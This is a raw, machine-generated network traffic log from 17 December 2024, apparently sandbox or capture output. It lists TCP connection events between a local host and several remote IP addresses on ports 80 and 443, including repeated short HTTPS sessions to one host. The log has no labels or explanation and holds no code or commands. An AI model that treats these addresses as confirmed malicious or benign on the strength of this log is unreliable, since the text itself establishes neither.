                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.508812904 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.509591103 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.509638071 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.509665012 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.509696960 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.510416031 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.510462046 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.510499001 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.510530949 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.511456013 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.511560917 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.511574984 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.511671066 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.626529932 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.626658916 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.626835108 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.626844883 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.626852036 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.626888990 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.626920938 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.627732038 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.627754927 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.627784014 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.628365040 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.628391981 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.628408909 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.628534079 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.628573895 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.660594940 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.660679102 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.660703897 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.660746098 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.660950899 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.661037922 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.661156893 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.661201000 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.661216974 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.661262035 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.662050009 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.662101030 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.662118912 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.662161112 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.662883997 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.662934065 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.663041115 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.663085938 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.663794041 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.663840055 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.663872004 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.663911104 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.664669037 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.664721966 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.664879084 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.664930105 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.665538073 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.665586948 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:39.217778921 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:39.218869925 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:40.621834040 CET4973080192.168.2.4192.229.211.108
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:40.742698908 CET8049730192.229.211.108192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:40.744566917 CET4973080192.168.2.4192.229.211.108
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:41.692169905 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.427717924 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.427767992 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.427892923 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.440893888 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:02.440934896 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:03.824028969 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:03.824141026 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.022171974 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.022185087 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.022576094 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.023662090 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.026894093 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.071331978 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516752958 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516783953 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516824007 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516827106 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516855955 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516872883 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516880989 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516911030 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.516936064 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.519269943 CET49756443192.168.2.4149.154.167.99
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.519285917 CET44349756149.154.167.99192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.842808008 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.842856884 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.842930079 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.843238115 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:04.843250990 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:06.677196980 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:06.677367926 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:06.681159019 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:06.681180000 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:06.681461096 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:06.681534052 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:06.681992054 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:06.723336935 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.370079994 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.370157957 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.370177984 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.370207071 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.372653961 CET49764443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.372673988 CET44349764116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.374501944 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.374531031 CET44349773116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.374609947 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.374819994 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:07.374835014 CET44349773116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:08.786981106 CET44349773116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:08.787046909 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:08.787431955 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:08.787444115 CET44349773116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:08.789175034 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:08.789181948 CET44349773116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.686038971 CET44349773116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.686117887 CET44349773116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.686168909 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.686188936 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.686398029 CET49773443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.686424971 CET44349773116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.687715054 CET49779443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.687757969 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.687830925 CET49779443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.688061953 CET49779443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:09.688071012 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.092619896 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.092695951 CET49779443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.093117952 CET49779443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.093123913 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.095382929 CET49779443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.095386982 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.992928982 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.992947102 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.993010998 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.993258953 CET49779443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.993819952 CET49779443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.993885040 CET44349779116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.995968103 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.996006012 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.996098995 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.996428967 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:11.996445894 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:13.401850939 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:13.401897907 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:13.402368069 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:13.402376890 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:13.404411077 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:13.404417992 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.293334007 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.293353081 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.293410063 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.293416023 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.293446064 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.293473005 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.293986082 CET49785443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.294035912 CET44349785116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.295885086 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.295950890 CET44349791116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.296025991 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.296515942 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:14.296545029 CET44349791116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:15.706226110 CET44349791116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:15.706286907 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:15.706871986 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:15.706878901 CET44349791116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:15.708653927 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:15.708661079 CET44349791116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.597424984 CET44349791116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.597553968 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.597589016 CET44349791116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.597654104 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.597776890 CET49791443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.597817898 CET44349791116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.622442961 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.622558117 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.622699976 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.622988939 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:16.623011112 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:17.637980938 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:17.638025999 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:17.638103962 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:17.638303041 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:17.638314962 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:18.028235912 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:18.028311014 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:18.028738976 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:18.028748989 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:18.030468941 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:18.030482054 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:18.030523062 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:18.030534029 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.013585091 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.013663054 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.013696909 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.013727903 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.014691114 CET49797443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.014708996 CET44349797116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.048679113 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.049125910 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.051726103 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.051743031 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.053930044 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:19.053944111 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:20.031110048 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:20.031162024 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:20.031172037 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:20.031191111 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:20.031224012 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:20.032535076 CET49798443192.168.2.4116.203.12.114
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:20.032553911 CET44349798116.203.12.114192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.346112013 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.346160889 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.346487999 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.346777916 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.346790075 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.497201920 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.497306108 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.497387886 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.497603893 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.497641087 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.572386980 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.572432995 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.572716951 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.573095083 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.573113918 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.642546892 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.642589092 CET44349817142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.642666101 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.642966032 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:21.642981052 CET44349817142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.043041945 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.043380022 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.043395042 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.044442892 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.044516087 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.045816898 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.045816898 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.045839071 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.045891047 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.101217985 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.101228952 CET44349814142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.141180992 CET49814443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.187622070 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.191385031 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.191448927 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.192467928 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.192543030 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.192893982 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.192962885 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.193064928 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.193083048 CET44349815142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.241977930 CET49815443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.262734890 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.263133049 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.263156891 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.264204979 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.264266968 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.264589071 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.264663935 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.264723063 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.264729023 CET44349816142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.305804014 CET49816443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.342102051 CET44349817142.250.181.100192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.342391014 CET49817443192.168.2.4142.250.181.100
                                                                                                                                                                                                                                                  Dec 17, 2024 17:29:23.342437029 CET44349817142.250.181.100192.168.2.4
